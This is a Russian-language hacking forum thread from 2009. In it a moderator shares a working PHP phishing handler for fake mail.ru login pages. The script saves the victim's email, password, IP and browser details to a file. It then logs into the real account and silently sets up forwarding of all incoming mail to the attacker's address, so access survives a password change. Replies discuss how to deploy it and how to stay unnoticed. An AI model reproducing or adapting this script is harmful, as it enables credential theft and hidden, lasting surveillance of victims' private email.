ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
Прячем "подарок" в ящике майла |
31.10.2009, 21:41
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056
Репутация:
1089
|
|
Прячем "подарок" в ящике майла
Собственно говоря навеянно темой http://forum.antichat.ru/thread130561.html
Сидим ты с товарищем zifanchuck - общаемся по аське и обалдеваем со скорости с которой товарищи с mail.ru латают дыры ну и собственно говоря чтоб они не остались без работы  решили с ним написать простенький скрипт. Это собственно говоря часть фейка обычный файл с названием log.php
Давайте порассуждаем как нам продлить свое незаметное прибывание на ящике жертвы? И что б вы сделали в первую очередь еслиб заподозрили что на вашем почтовом ящике "завелась какаято бяка"? Ответ напрашиваеться сам собой- бежим менять пасс и контрольный вопрос на восстановлении пароля- логично? (именно поэтому эту часть мы трогать небудем)
Ну а чтож тогда остаеться в Нашем распоряжении??? Скажете- ничего? Типа жертва сменила пасс и вопрос- и мы доступ потеряли? Да так могут сказать 99% пользователей, но почемуто мы всегда без внимания оставляем маленькую деталь- а именно мы можем прописать СВОЕ мыло в ящике жертвы....(а вы когда последний раз залазили в своем ящике в пересылку писем?), Я думаю что уже почти все догадались что просто в нашем фейке- мы пропишем свое мыло на которое хотим получать всю входящую почту жертвы . Оригинальнось этого способа что при удачном стечении обстоятельств мы читаем письма жертвы а они у нее остаються в ящике непрочтенными, для этого надо лиш к своему фейку прикрутить обыкновенный файлик log.php который мы с товарищем Zifanchuk нарисовали специально для пользователей antichat.ru в котором единственное надо прописать свое мыло которое мы прячем в ящике жертвы, ну а после того как жертва авторизируеться- бежать на свой ящик и делать подтверждение на привязку своего ящика к ящику жертвы и тихо-тихо без палива читать все входящие которые получит наша жертва, а вот собственно говоря сам скрипт
PHP код:
<?php
/**
* @author Kusto & Zifanchuck
* @copyright 2009
//Скрипт непретендует на оригинальность
//Просто стараемся замаскироваться в ящике жертвы
//был выложен на antichat.ru
*/
$Login = $_POST['login']; //Логин
$Domain = $_POST['domain'];
$Pass = $_POST['password']; // Пароль
$ip = $_SERVER["REMOTE_ADDR"]; // IP Жертвы
$Data = date("d-m-y H:i:s", time()); // Дата и время
$Browser = getenv("HTTP_USER_AGENT");
$Port = getenv("REMOTE_PORT");
$Connect = $_SERVER['HTTP_CONNECTION'];
$Host = gethostbyaddr(getenv("REMOTE_ADDR"));
$Mymail='Наше мыло';//здесь записываем наше мыло на которое хотим получать письма с ящика жертвы в формате vasya@mail.ru
$filelog = fopen("base.php","a+"); //открываем файл базы
$text = "[$Data] Browser:[$Browser] Port:[$Port] Connect:[$Connect] Host:[$Host] IP:$ip Мыло:$Login@$Domain Пасс:$Pass";
fwrite($filelog,"\n $text \n"); //записываем всё
fclose($filelog); //закрываем
function curl($url,$post)
{
$cfile = 'cookies.txt';
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile);
curl_setopt($ch, CURLOPT_POST, 1);
$result = curl_exec($ch);
curl_close($ch);
return $result;
};
$result = curl('http://win.mail.ru/cgi-bin/auth', 'Login='.$Login.'&Domain='.$Domain.'&Password='.$Pass);
$result = curl('http://win.mail.ru/cgi-bin/modifyfwd', 'modify=1&Username='.$Login.'&Forward='.$Mymail.'&oldPswd='.$Pass);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://win.mail.ru/cgi-bin/auth?&Login=$Login&Domain=$Domain&Password=$Pass'></head></html>"; // кидаем пользователя в ящик
?>
P.S. Еще раз напоминаю что работа не авторская а результат бреда бвух балбесов которые мирно болтали в асе и их осенило (я имел ввиду себя и Zifanchuck)
P.S. S.Пользуясь случаем хочу передать привет работникам mail.ru и пожелать процветания их компании втечении долгих долгих лет, с Уважением Кусто
Последний раз редактировалось Kusto; 31.10.2009 в 22:23..
|
|
|
31.10.2009, 21:49
|
|
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393
Репутация:
464
|
|
В теме постите результаты тестов ну и ваши предложения. ждемс)
|
|
|
|
31.10.2009, 22:08
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 159
Провел на форуме:
912928
Репутация:
137
|
|
нифига не понял. просто фейк, который настроит переадресацию?
|
|
|
|
31.10.2009, 22:18
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056
Репутация:
1089
|
|
Сообщение от zavra
нифига не понял. просто фейк, который настроит переадресацию?
Просто фейк который сохраняет мыло пасс в base.php
так-же сохраняет куки в файл а Самое главное прячет ВАШЕ мыло в ящике жертвы впоследствии на которое вы получаете все входящие письма предназначенные для вашей жертвы (вернее копии писем)- это надо для того чтоб например у жертвы стоит высокая безопасность и вы неможете зайти на ящик либо тут-же сменила жертва и пасс и вопрос (чтоб контроль над ящиком непотерять)
|
|
|
|
31.10.2009, 22:29
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 159
Провел на форуме:
912928
Репутация:
137
|
|
ну ок, идея все же не нова. и человек, ставящий такие высокие настройки безопасности, вряд ли поведется на фейк.
|
|
|
|
31.10.2009, 22:35
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056
Репутация:
1089
|
|
Сообщение от zavra
ну ок, идея все же не нова. и человек, ставящий такие высокие настройки безопасности, вряд ли поведется на фейк.
1.Я никогда невидел реализацию (ткните меня носом где вы это видели)
2.За мою долгую практику (как можете видеть из этой темы http://forum.antichat.ru/thread57658.html) Высокую безопасность ставят именно ламеры, а на фейк как ты выразился.... просто ты видел наверное пабликфейки и делаеш выводы о всех (я иногда сам теряюсь: фейк передо мной или нет) ()))
|
|
|
|
21.11.2009, 02:36
|
|
Познающий
Регистрация: 30.05.2009
Сообщений: 30
Провел на форуме:
51678
Репутация:
-4
|
|
А еще чего интересного засунуть в мыло изнутри, чтоб копнуть поглубже? Мыслей хороших не возникало?))))))
|
|
|
|
21.11.2009, 03:34
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
тяжеловато будет кого на фейк закинуть, это вам не вконтакте.ру где можно пару букав изменить, а в мейл измени так сразу спалят )
|
|
|
|
21.11.2009, 20:33
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056
Репутация:
1089
|
|
Сообщение от satana-fu
ничего что при входе в ящик под папками бывает надпись ???  палевно.... надпись прямо в глаза лезет Где ты такое увидел??? 0_о я думал уже майл снова что то пофиксил- нифига- настроил пересылку на яндекс- все чисто- никаких записей по поводу пересылки.....
|
|
|
|
22.11.2009, 12:02
|
|
Постоянный
Регистрация: 28.09.2008
Сообщений: 456
Провел на форуме:
2244151
Репутация:
404
|
|
Один кернет нихера не понял
Вот я закатал скрипт на локалхост,закатал туда-же base.php, дальше я так понимаю нужен фейк мылару?) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
